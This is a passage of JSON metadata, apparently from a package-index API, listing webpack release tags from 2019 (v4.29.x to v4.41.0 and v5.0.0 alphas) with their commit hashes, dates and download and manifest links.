leases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyst